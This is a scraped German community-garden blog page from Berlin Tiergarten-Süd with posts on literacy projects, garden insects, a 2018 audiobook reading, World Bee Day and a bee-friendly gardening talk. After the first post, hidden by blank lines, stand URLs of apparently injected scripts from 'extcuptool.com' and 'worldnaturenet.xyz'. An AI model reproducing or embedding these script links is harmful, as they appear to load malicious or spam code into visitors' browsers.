Kreativität und Freude an Sprache in Tiergarten-Süd

Gemeinsame Gestaltung eines Pop-Up-Buches, Bilder aus Naturmaterialien enstehen lassen, seine eigene Geschichte erzählen und selber in Buchform binden, biografisches Arbeiten, traditionelle Märchen mit der Kamishibai-Bühne neu und individuell präsentieren und und und…
Die Kultur- und Literacy-Angebote von Babette Dombrowski, sind mehr als vielfältig.

Was ihnen gemeinsam ist:
Die Entdeckung und die Freude an der eigenen Kreativität und das Erlernen eines souveränen Umgangs mit der deutschen Sprache als Grundlage einer gelingenden Kommunikation in der Gemeinschaft mit anderen und Entwicklung der eigenen Persönlichkeit.

Gerne werden Familien, Kindergärten, Schulen und Kooperationspartner in Frau Dombrowskis Projekte mit einbezogen, die Ergebnisse sind häufig überraschend, aber immer ertragsreich.

Jede_r bekommt die Zeit, sich auszudrücken, jede_r erhält die Gelegenheit, seine eigene Geschichte zu erzählen.
Und jede_r ist am Ende stolz auf sein selbst erstelltes Werk!

Frau Dombrowki geht nun in Sommerpause, ab dem 28.8.2018 geht`s weiter.

Bei Interesse an individuellen Kultur- und Literacy-Projekten für Gruppen und Einzelpersonen jeglichen Alters bitte direkt an:

babette.dombrowski@t-online.de

Ein Teil der Angebote von Babette Dombrowski finden statt in der Grünen Bibliothek der Nachbarschaft, Bibliothek Tiergarten-Süd und werden gefördert durch:

       
      

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

//extcuptool.com/1c7599b464aaa033e4.js

https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7285x&r=51https://extcuptool.com/ext/1c7599b464aaa033e4.js?sid=52295_7285_&title=FF_cuptopext.cool&blocks%5B%5D=31af2

Advertisements

Gartennutzer im Gemeinschaftsgarten

Zu unserer Freude entdecken wir mehr und mehr Insekten in unserem naturnah gestalteten Garten, die uns zum Teil leider gar nicht mehr bekannt sind.

Neu getroffen haben wir den beeindruckend großen, bunt schillerndern Rosenkäfer – Cetonia aurata

 

und den sehr hübschen gebänderten Pinselkäfer – Trichius fasciatus

http://www.tierportraet.ch/htm07d/pinselkaefer_gebaendert.php

Da die Larven dieser beiden Insekten in morschem Holz (oder auch im Kompost) leben, vermuten wir ihren Lebensraum in dem größten unserer Totholzhaufen.

Ein Ansporn für uns, in unserem Stadtgarten immer mehr wohnliche Bereiche nicht nur für die Menschen einzurichten.

Auf dass die Vielfalt in unserer Welt (über-) lebe und uns und sie bereichert!

 

 


Sissinghurst – Portrait eines Gartens

Sissinghurst – Portrait eines Gartens
Marit Beyer liest in der Stadtbibliothek Berlin-Mitte

Am Donnerstag, den 24. Mai 2018 um 20.00 Uhr liest Marit Beyer in der Philipp-Schaeffer-Bibliothek aus dem Hörbuch Sissinghurst – Portrait eines Gartens.

Sie waren reich, berühmt und exzentrisch. Und so kauften die Schriftstellerin Vita Sackville-West und ihr Mann Harold Nicholson, ebenfalls Schriftsteller und Diplomat, 1930 die Reste eines alten Schlosses samt dem umliegenden, verwahrlosten Land und verwandelten es in den folgenden Jahrzehnten zu einem prachtvollen Gartenensemble. Weil sie öfter getrennt und beide wortsüchtig waren, sind ihre Briefe, Tagebuchaufzeichnungen und Rundfunkbeiträge faszinierende Zeugnisse dieses Schöpfungsprozesses. Eine Auswahl davon ist als „Sissinghurst – Porträt eines Gartens“ herausgegeben worden, die der Diwan Verlag als akustische Version veröffentlicht hat – gelesen von Marit Beyer.

Die Veranstaltung findet im Rahmen der diesjährigen Hörbuch-Präsentation HörGut Berlin-Mitte 2018 vom 09.04.-01.06.2018 statt: Unter dem Motto „Gestern auf der Messe – heute in Berlin“ können sich die Besucher der Ausstellung einen umfassenden Überblick über die neusten Produktionen zahlreicher Verlage verschaffen. Eintritt frei.

Weitere Informationen unter: https://www.berlin.de/stadtbibliothek-mitte/

Philipp-Schaeffer-Bibliothek
Brunnenstr. 181, 10119 Berlin
Tel.: (030) 9018 2 4444 | E-Mail: schaeffer@stb-mitte.de
U8 Rosenthaler Platz; Tram M1, M8, 12; Bus 240
Mo – Fr 10.00-19.30 Uhr; Sa 10.00-14.00 Uhr

das Plakat zur Veranstaltung: Plakat_Sissinghurst_20180524_CD


Heute ist Weltbienentag!

Gestern hat das Gericht der EU die Klage von Bayer und Syngenta abgewiesen, mit der die Neonikotinoid-Konzerne weiter ihren Gewinn über das Bienenwohl stellen wollten. Und heute hat das Team des BUND mit mehr als 180.000 Unterschriften den Ministerinnen Schulze und Klöckner den Auftrag in die Hände gegeben:
Rettet unsere Bienen!

Nun ist die Politik am Zug.

„Wir fordern von der Bundesregierung weitreichende, effektive und sofortige Maßnahmen für die Bienen und alle Insekten. So ist über die Hälfte der heimischen Wildbienen in ihrem Bestand gefährdet. Gerade für den Menschen ist der Schutz der kleinen Bestäuber überlebenswichtig“, so Olaf Bandt, Bundesgeschäftsführer für Politik und Kommunikation beim BUND, während der Übergabe.

https://aktion.bund.net/a-place-to-bee

https://aktion.bund.net/gemeinsam-gegen-glyphosat

https://www.deutschland-summt.de/home.html

Und: Am 28.8. um 18.30 Uhr in der Grünen Bibliothek, Bibliothek Tiergarten-Süd: 

Bienenfreundlich Gärtnern –  wie geht das?


Bienenfreundlich Gärtnern – wie geht das? Vortrag am 28.5.2018

Wir laden herzlich ein zu dem Vortrag:

Bienenfreundlich Gärtnern – wie geht das?

am Montag, den 28. Mai 2018 in der Grünen Bibliothek in Berlin Tiergarten-Süd um 18.30 Uhr, Eintritt frei.

Was ist der Unterschied zwischen Honig- und Wildbienen und wie leben Seiden-, Hosen-, Masken- oder Gartenwollbienen eigentlich?

Welche Pflanzen versorgen die bedrohten Insekten mit Pollen für ihren Nachwuchs? Welche Gartenstrukturen wie Totholz, Steine, Wasserstellen sind sinnvoll und wie baut man sie? Was kann man auf Terrassen und Balkonen für die kleinen Summer tun? Diese Fragen werden anschaulich von der Biologin präsentiert. Pflanzlisten werden ausgegeben, Bücher verkauft und zur Ansicht mitgebracht und Regio-Saatgut gegen Spende abgegeben.

Referentin: Dr. Biol. Corinna Hölzer, Initiative „Berlin summt!“,
Stiftung für Mensch und Umwelt

 

Die Grüne Bibliothek der Nachbarschaft befindet sich in der
Bibliothek Tiergarten-Süd
Lützowstr. 27
10785 Berlin

Weitere Informationen zum Thema unter:
https://www.deutschland-summt.de/home.html

allgemeiner Kontakt: wachsenlassen@web.de

zum Ausdrucken: Vortrag Berlin summt 5.18


Gartennutzer

Aurorafalter (Anthocharis cardamines)

 

 

 

und

 

 

 

 

 

Stieglitz (Distelfink)

haben sich in unserem Garten eingefunden.  Herzlich willkommen!


Selbst sind die Kinder…

…und bauten ihre neue Buddelecke im Garten daher mit eigenen Kräften.

Während ‚die Großen‘ schaufelten und die Erfahrung machen konnten, wie es ist, wenn man seine Schubkarre zu voll lädt (und wie man mit einer – vollen – Schubkarre um die Ecke kommt), wurde der neue Spielplatz von den Kleinsten schon während der Bauphase stillschweigend erobert.

Am Ende waren dann doch alle froh, als die Arbeit geschafft war und so schön (und schattig) sieht unser kleiner neuer Buddelplatz unter dem Baumhaus jetzt aus: